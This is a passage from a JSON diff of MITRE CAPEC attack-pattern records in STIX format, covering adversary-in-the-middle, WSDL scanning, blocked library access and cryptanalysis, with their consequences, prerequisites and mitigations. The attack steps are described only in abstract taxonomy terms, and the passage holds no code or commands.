"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1004a1b-30e7-4057-b6bd-640ad3d2d21c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use static analysis tools to identify log forging vulnerabilities.", + "id": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65f16c8f-4535-4431-928b-ab9c8d336a93", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.", + "id": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb05b9ba-1c0b-4cf6-a5cf-94af69a17b39", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.\n ", + "external_references": [ + { + "external_id": "CAPEC-94", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-593", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "description": "Adversary-in-the-Middle", + "external_id": "T1557", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557" + }, + { + "description": "Man-in-the-middle attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "M. Bishop, Computer Security: Art and Science, 2003, Addison-Wesley", + "external_id": "REF-553", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Man-in-the-middle attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-633", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "Kyle Chivers, What is a man-in-the-middle attack?, 2020--03---26, NortonLifeLock Inc.", + "external_id": "REF-634", + "source_name": "reference_from_CAPEC", + "url": "https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html" + }, + { + "description": "Man in the middle (MITM) attack, Imperva", + "external_id": "REF-635", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/" + }, + { + "description": "Jerry Decime, Settling the score: taking down the Equifax mobile application, 2017--09---13", + "external_id": "REF-636", + "source_name": "reference_from_CAPEC", + "url": "https://www.linkedin.com/pulse/settling-score-taking-down-equifax-mobile-application-jerry-decime/" + } + ], + "id": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Adversary in the Middle (AiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Man-in-the-Middle / MITM", + "Person-in-the-Middle / PiTM", + "Monkey-in-the-Middle", + "Monster-in-the-Middle", + "On-path Attacker" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2017, security researcher Jerry Decime discovered that Equifax mobile applications were not leveraging HTTPS in all areas. Although authentication was properly utilizing HTTPS, in addition to validating the root of trust of the server certificate, other areas of the application were using HTTP to communicate. Adversaries could then conduct MITM attacks on rogue WiFi or cellular networks and hijack the UX. This further allowed the adversaries to prompt users for sensitive data, which could then be obtained in the plaintext response. [REF-636]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

    2. Techniques
    Perform a sniffing attack and observe communication to determine a communication protocol.
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

    2. Techniques
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Use Intercepted Data Maliciously: The adversary observes, filters, or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

    2. Techniques
    Prevent some messages from reaching their destination, causing a denial of service.
", + "x_capec_extended_description": "\n Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first flows through the adversary, who has the opportunity to observe or alter it, before being passed on to the intended recipient as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for these attacks yields an implicit lack of trust in communication or identify between two components.\n These attacks differ from Sniffing Attacks (CAPEC-157) since these attacks often modify the communications prior to delivering it to the intended recipient.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814" + ], + "x_capec_prerequisites": [ + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "An attacker can eavesdrop on the communication between the target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.", + "The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption." + ], + "x_capec_skills_required": { + "Medium": "This attack can get sophisticated since the attack may use cryptography." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Public Keys are signed by a Certificate Authority", + "id": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5264115d-5e8a-4dbd-95fe-60d77876319d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt communications using cryptography (e.g., SSL/TLS)", + "id": "course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6822ab84-ff48-490b-8bff-9eb89ae991ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use Strong mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3043134e-bd5e-43ae-93a4-4f2f31bda6cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exchange public keys using a secure channel", + "id": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbfe5c41-f0ba-4524-aeaa-5d46d305a1a7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "It is important to protect WSDL file or provide limited access to it.", + "id": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eca4d328-57ff-446e-ad42-ccc2cef859ec", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). Make sure that none of them is vulnerable to injection.", + "id": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c5539c8-19a6-45b2-bcb9-4fb404dc382b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.", + "id": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b13c359-babb-4e00-bfc7-ea8f84451bfe", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.", + "id": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a99d577-7a8d-4c25-a919-00e88b344543", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate the received messages against the WSDL Schema. Incomplete solution.", + "id": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8c83203-1d4b-4007-9bfc-d9e5e4cd1040", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.", + "external_references": [ + { + "external_id": "CAPEC-96", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-589", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/589.html" + } + ], + "id": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Block Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Alter Execution Logic" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine what external libraries the application accesses.

Experiment

  1. Block access to the external libraries accessed by the application.

  2. Monitor the behavior of the system to see if it goes into an insecure/inconsistent state.

  3. If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application requires access to external libraries.", + "An attacker has the privileges to block application access to external libraries." + ], + "x_capec_skills_required": { + "Low": "Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.", + "id": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-96-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--348327f8-a11a-4875-acca-449bc953ceb1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "target_ref": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).", + "external_references": [ + { + "external_id": "CAPEC-97", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + }, + { + "external_id": "CWE-1240", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1240.html" + }, + { + "external_id": "CWE-1241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1241.html" + }, + { + "external_id": "CWE-1279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1279.html" + }, + { + "description": "Cryptanalysis", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cryptanalysis" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-556", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Cryptanalysis" + } + ], + "id": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cryptanalysis", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--30b081a0-bf20-432b-8211-a340bbd04731" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (In most cases, if cryptanalysis is successful at all, an adversary will not be able to decrypt the entire message, but instead will only be able to deduce some information about the plaintext. However, that may be sufficient for an adversary, depending on the context of the attack.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_example_instances": [ + "A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they 